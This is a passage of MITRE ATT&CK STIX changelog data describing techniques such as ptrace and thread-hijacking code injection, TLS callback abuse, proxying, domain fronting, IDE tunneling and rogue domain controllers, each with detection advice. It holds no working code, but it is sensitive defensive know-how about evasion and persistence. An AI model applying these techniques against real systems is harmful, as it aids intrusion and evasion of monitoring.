The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/008", + "external_id": "T1055.008" + }, + { + "source_name": "PTRACE man", + "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.", + "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html" + }, + { + "source_name": "Medium Ptrace JUL 2018", + "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. 
Retrieved February 21, 2020.", + "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be" + }, + { + "source_name": "BH Linux Inject", + "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.", + "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf" + }, + { + "source_name": "ArtOfMemoryForensics", + "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017." + }, + { + "source_name": "GNU Acct", + "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", + "url": "https://www.gnu.org/software/acct/" + }, + { + "source_name": "RHEL auditd", + "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + }, + { + "source_name": "Chokepoint preload rootkits", + "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. 
Retrieved December 20, 2017.", + "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:25.896000+00:00\", \"old_value\": \"2025-04-15 19:59:18.215000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:28:32.166000+00:00", + "modified": "2025-04-25 14:46:28.558000+00:00", + "name": "Thread Execution Hijacking", + "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. 
At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/003", + "external_id": "T1055.003" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. 
Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Modification", + "Process: Process Access" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:28.558000+00:00\", \"old_value\": \"2025-04-15 19:58:26.012000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-14 01:30:41.092000+00:00", + "modified": "2025-04-25 14:48:21.860000+00:00", + "name": "Thread Local Storage", + "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. 
Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process\u2019 memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/005", + "external_id": "T1055.005" + }, + { + "source_name": "FireEye TLS Nov 2017", + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. 
Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Modification", + "Process: Process Access", + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:21.860000+00:00\", \"old_value\": \"2025-04-15 19:59:16.376000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1040: Behavior Prevention on Endpoint" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Access)", + "DS0009: Process (Process Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:08.479000+00:00", + "modified": "2025-04-25 15:15:44.084000+00:00", + "name": "Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. 
Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090", + "external_id": "T1090" + }, + { + "source_name": "Trend Micro APT Attack Tools", + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jon Sheedy", + "Heather Linn", + "Walker Johnson" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network Devices", + "ESXi" + ], + "x_mitre_version": "3.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:44.084000+00:00\", \"old_value\": \"2025-04-15 19:58:41.686000+00:00\"}}}", + "previous_version": "3.2", + "changelog_mitigations": { + "shared": [ + "M1020: SSL/TLS Inspection", + "M1031: Network Intrusion Prevention", + "M1037: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 23:29:19.581000+00:00", + "modified": "2025-04-25 14:48:02.492000+00:00", + "name": "Domain Fronting", + "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. 
(Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090/004", + "external_id": "T1090.004" + }, + { + "source_name": "Fifield Blocking Resistent Communication through domain fronting 2015", + "description": "David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern Paxson. (2015). Blocking-resistant communication through domain fronting. 
Retrieved November 20, 2017.", + "url": "http://www.icir.org/vern/papers/meek-PETS-2015.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Kelly, @breakersall" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:02.492000+00:00\", \"old_value\": \"2025-04-16 20:37:20.863000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1020: SSL/TLS Inspection" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--77e29a47-e263-4f11-8692-e5012f44dbac", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-20 18:46:24.598000+00:00", + "modified": "2025-04-22 16:34:13.454000+00:00", + "name": "IDE Tunneling", + "description": "Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a 
network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)\n\nAdditionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.\n\nIDE tunneling tools may be built-in or installed as [IDE Extensions](https://attack.mitre.org/techniques/T1176/002).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1219/001", + "external_id": "T1219.001" + }, + { + "source_name": "sentinelone operationDigitalEye Dec 2024", + "description": "Aleksandar Milenkoski, Luigi Martire. (2024, December 10). Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels. 
Retrieved February 27, 2025.", + "url": "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/" + }, + { + "source_name": "Unit42 Chinese VSCode 06 September 2024", + "description": "Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.", + "url": "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/" + }, + { + "source_name": "Thornton tutorial VSCode shell September 2023", + "description": "Truvis Thornton. (2023, September 25). Visual Studio Code: embedded reverse shell and how to block, create Sentinel Detection, and add Environment Prevention. Retrieved March 24, 2025.", + "url": "https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Purinut Wongwaiwuttiguldej" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "File: File Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Purinut Wongwaiwuttiguldej\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 16:34:13.454000+00:00\", \"old_value\": \"2025-04-15 19:58:42.909000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + 
}, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0022: File (File Creation)", + "DS0029: Network Traffic (Network Connection Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--a9fb6b3f-4a3c-4703-a4f1-f55f83d1e017", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-26 15:36:18.409000+00:00", + "modified": "2025-05-02 19:13:42.314000+00:00", + "name": "Remote Access Hardware", + "description": "An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment. \n\nRemote access hardware may be physically installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote session with the target system. Using hardware-based remote access tools may allow threat actors to bypass software security solutions and gain more control over the compromised device(s).(Citation: Palo Alto Unit 42 North Korean IT Workers 2024)(Citation: Google Cloud Threat Intelligence DPRK IT Workers 2024)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1219/003", + "external_id": "T1219.003" + }, + { + "source_name": "Google Cloud Threat Intelligence DPRK IT Workers 2024", + "description": "Codi Starks, Michael Barnhart, Taylor Long, Mike Lombardi, Joseph Pisano, and Alice Revelli. (2024, September 23). Staying a Step Ahead: Mitigating the DPRK IT Worker Threat. 
Retrieved March 26, 2025.", + "url": "https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/" + }, + { + "source_name": "Palo Alto Unit 42 North Korean IT Workers 2024", + "description": "Evan Gordenker. (2024, November 13). Global Companies Are Unknowingly Paying North Koreans: Here\u2019s How to Catch Them. Retrieved March 26, 2025.", + "url": "https://unit42.paloaltonetworks.com/north-korean-it-workers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Joe Gumke, U.S. Bank", + "Shwetank Murarka", + "Michael Davis, ServiceNow Threat Intelligence" + ], + "x_mitre_data_sources": [ + "Drive: Drive Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-05-02 19:13:42.314000+00:00\", \"old_value\": \"2025-04-16 17:20:16.375000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][2]\": \"Michael Davis, ServiceNow Threat Intelligence\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][1]\": \"Michael Davis @ ServiceNow Threat Intelligence\"}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1034: Limit Hardware Installation" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0016: Drive (Drive Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + 
"modified": "2025-04-25 15:15:34.258000+00:00", + "name": "Rogue Domain Controller", + "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1207", + "external_id": "T1207" + }, + { + "source_name": "DCShadow Blog", + "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. 
Retrieved March 20, 2018.", + "url": "https://www.dcshadow.com/" + }, + { + "source_name": "Adsecurity Mimikatz Guide", + "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?page_id=1821" + }, + { + "source_name": "GitHub DCSYNCMonitor", + "description": "Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.", + "url": "https://github.com/shellster/DCSYNCMonitor" + }, + { + "source_name": "Microsoft DirSync", + "description": "Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.", + "url": "https://msdn.microsoft.com/en-us/library/ms677626.aspx" + }, + { + "source_name": "ADDSecurity DCShadow Feb 2018", + "description": "Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.", + "url": "https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_data_sources": [ + "Active Directory: Active Directory Object Modification", + "Network Traffic: Network Traffic Content", + "User Account: User Account Authentication", + "Active Directory: Active Directory Object Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). 
(Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \u201cGC/\u201d) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235\u20134B06\u201311D1-AB04\u201300C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:34.258000+00:00\", \"old_value\": \"2025-04-15 19:58:32.959000+00:00\"}}}", + "previous_version": "2.2", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0002: User Account (User Account Authentication)", + "DS0026: Active Directory (Active Directory Object Creation)", + "DS0026: Active Directory (Active Directory Object Modification)", + "DS0029: Network Traffic (Network Traffic 